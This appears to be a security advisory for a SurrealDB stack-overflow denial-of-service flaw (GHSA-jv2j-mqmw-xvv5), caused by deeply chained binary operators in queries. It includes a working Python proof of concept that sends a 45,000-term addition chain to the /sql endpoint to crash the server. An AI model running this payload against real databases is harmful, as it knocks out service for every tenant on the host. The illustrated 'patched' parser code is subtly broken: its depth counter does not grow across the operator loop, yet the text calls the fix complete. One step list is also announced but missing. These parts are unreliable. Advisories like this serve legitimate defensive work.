GHSA-jv2j-mqmw-xvv5: Stack Overflow Denial of Service in SurrealDB Query Engine

SurrealDB is a multi-model database engine written in Rust that processes queries through its custom query language, SurrealQL. Plaintext queries are processed by a syntactic analyzer that translates statements into an Abstract Syntax Tree (AST) before compiler lowering and execution. The primary attack surface resides in endpoints exposing query-execution capabilities, specifically the HTTP /sql and WebSocket /rpc endpoints.

This vulnerability, tracked under GHSA-jv2j-mqmw-xvv5, is classified under CWE-674 (Uncontrolled Recursion) and CWE-400 (Uncontrolled Resource Consumption). It allows an authenticated user with low privileges to crash the database engine by executing a query containing a highly nested or extremely long flat chain of binary operators (e.g., thousands of additions or logical comparisons).

The impact is a total denial of service (DoS) affecting the SurrealDB node. Because SurrealDB operates as a single-process server, a crash terminates all active client connections and transactions across all database instances, namespaces, and tenants hosted on the affected system.

The root cause of this vulnerability lies in an architectural mismatch between the iterative query-parsing phase and the subsequent recursive AST-processing phases. SurrealDB's syntax parser uses a Pratt parser to handle operator precedence when parsing flat sequences of expressions and operators. Pratt parsing is executed iteratively using loops to append binary operators directly onto the spine of the AST.

Because this parsing phase operates iteratively rather than recursively, it successfully avoids standard call-stack limits or query-recursion guards. The parser processes arbitrarily long expressions without exhausting the call stack, producing an AST of arbitrary depth. For example, a query containing 50,000 chained addition operations yields a binary AST structure with a depth of 50,000 levels.

After parsing, downstream components walk the resulting deep AST to lower it to execution bytecode, serialize it for logs, or deallocate it from memory. These components perform recursive tree-walking operations. In Rust, the default deallocation (Drop implementation) for nested heap structures recursively destroys child nodes. Walking a 50,000-deep tree requires 50,000 nested stack frames, which quickly exhausts the typical 2MB stack space allocated to thread execution, triggering an uncatchable operating system-level stack overflow and a process abort.

The vulnerable implementation allowed the Pratt parser to build arbitrary tree depths because it lacked checks against the resulting AST height. Downstream components relied on standard recursion, which is highly sensitive to excessive nested structures. This code block shows how the Pratt parser built expression nodes iteratively, neglecting to validate overall depth constraints:

// Vulnerable parser pattern
fn parse_expr(&mut self, precedence: Precedence) -> Result<Expression, Error> {
    let mut left = self.parse_primary()?;
    while precedence < self.peek_precedence() {
        // Iterative loop permits infinite chaining
        // of binary operators, producing nested AST nodes
        left = self.parse_infix(left)?;
    }
    Ok(left)
}

The security patch introduced in SurrealDB version 3.1.5 resolves this vulnerability by establishing a strict recursion-depth budget during expression parsing. The expr_recursion_limit parameter (configurable via SURREAL_MAX_EXPRESSION_PARSING_DEPTH) is enforced directly in the parser logic. This prevents the construction of over-deep ASTs, raising a syntax error before any recursive traversals can be executed:

// Patched parser pattern
fn parse_expr(&mut self, precedence: Precedence, depth: u32) -> Result<Expression, Error> {
    // Enforce depth limit to prevent downstream stack overflow
    if depth > self.expr_recursion_limit {
        return Err(Error::MaxExpressionDepthExceeded);
    }
    let mut left = self.parse_primary(depth + 1)?;
    while precedence < self.peek_precedence() {
        left = self.parse_infix(left, depth + 1)?;
    }
    Ok(left)
}

This fix is complete because it addresses the issue at the ingestion layer, ensuring that no downstream compiler, serializer, or memory-cleanup operation ever encounters an AST that exceeds stack capacity.

To exploit this vulnerability, an attacker must have valid credentials with permission to execute arbitrary SurrealQL queries. The attack is performed by sending a single, malformed query consisting of a highly repetitive sequence of binary operators, such as addition (+) or logical operators (AND, OR). This payload can be transmitted via HTTP POST to the /sql endpoint or via persistent WebSocket frames to /rpc.

While the HTTP endpoint enforces a default 1 MiB body limit, a carefully crafted payload well below this limit can easily overflow the 2MB thread stack. The WebSocket /rpc endpoint is a highly reliable delivery vector because it often permits larger payloads. The attack sequence operates as follows:

No specialized tools are required. The following Python execution script demonstrates how a low-privileged authenticated session can trigger the crash:

import requests
 
url = "http://localhost:8000/sql"
headers = {"Accept": "application/json", "NS": "test", "DB": "test"}
# Generate deep operator chain
payload = "RETURN 1" + " + 1" * 45000 + ";"
 
try:
    response = requests.post(url, data=payload, headers=headers, auth=("user", "pass"))
    print("Status:", response.status_code)
except requests.exceptions.ConnectionError:
    print("[+] Success: Connection dropped. SurrealDB process terminated.")

The impact of this vulnerability is confined to service availability. Because the operating system terminates the process immediately following a stack overflow, the entire database engine halts. The vulnerability does not allow remote code execution or data extraction, nor does it result in database file corruption, since the crash occurs before transaction commit phases.

The CVSS v3.1 score is calculated as 6.5 (Medium). The score is limited by the requirement of valid credentials (PR:L). However, for multi-tenant SaaS environments or applications exposing raw query endpoints to low-privileged users, the impact is severe. An attacker can repeatedly execute the exploit to maintain a persistent state of denial of service, blocking all database transactions on the targeted host.

The definitive fix for this vulnerability is upgrading SurrealDB to version 3.1.5 or later. If immediate upgrading is not possible, administrators should implement the following workarounds to reduce risk:

1. Enable the --deny-arbitrary-query command-line capability flag. This restriction blocks ad-hoc user query execution, mitigating the risk from non-admin accounts.

2. Implement ingress payload limitations on reverse proxies (e.g., NGINX or Envoy) to drop HTTP POST requests and WebSocket frames that exceed 50 KB, preventing large nested operator sequences from reaching the parser.

3. Configure process supervision policies using systemd or Kubernetes restart policies. Ensure the database process restarts automatically on failure using configuration flags such as Restart=on-failure in the systemd service file.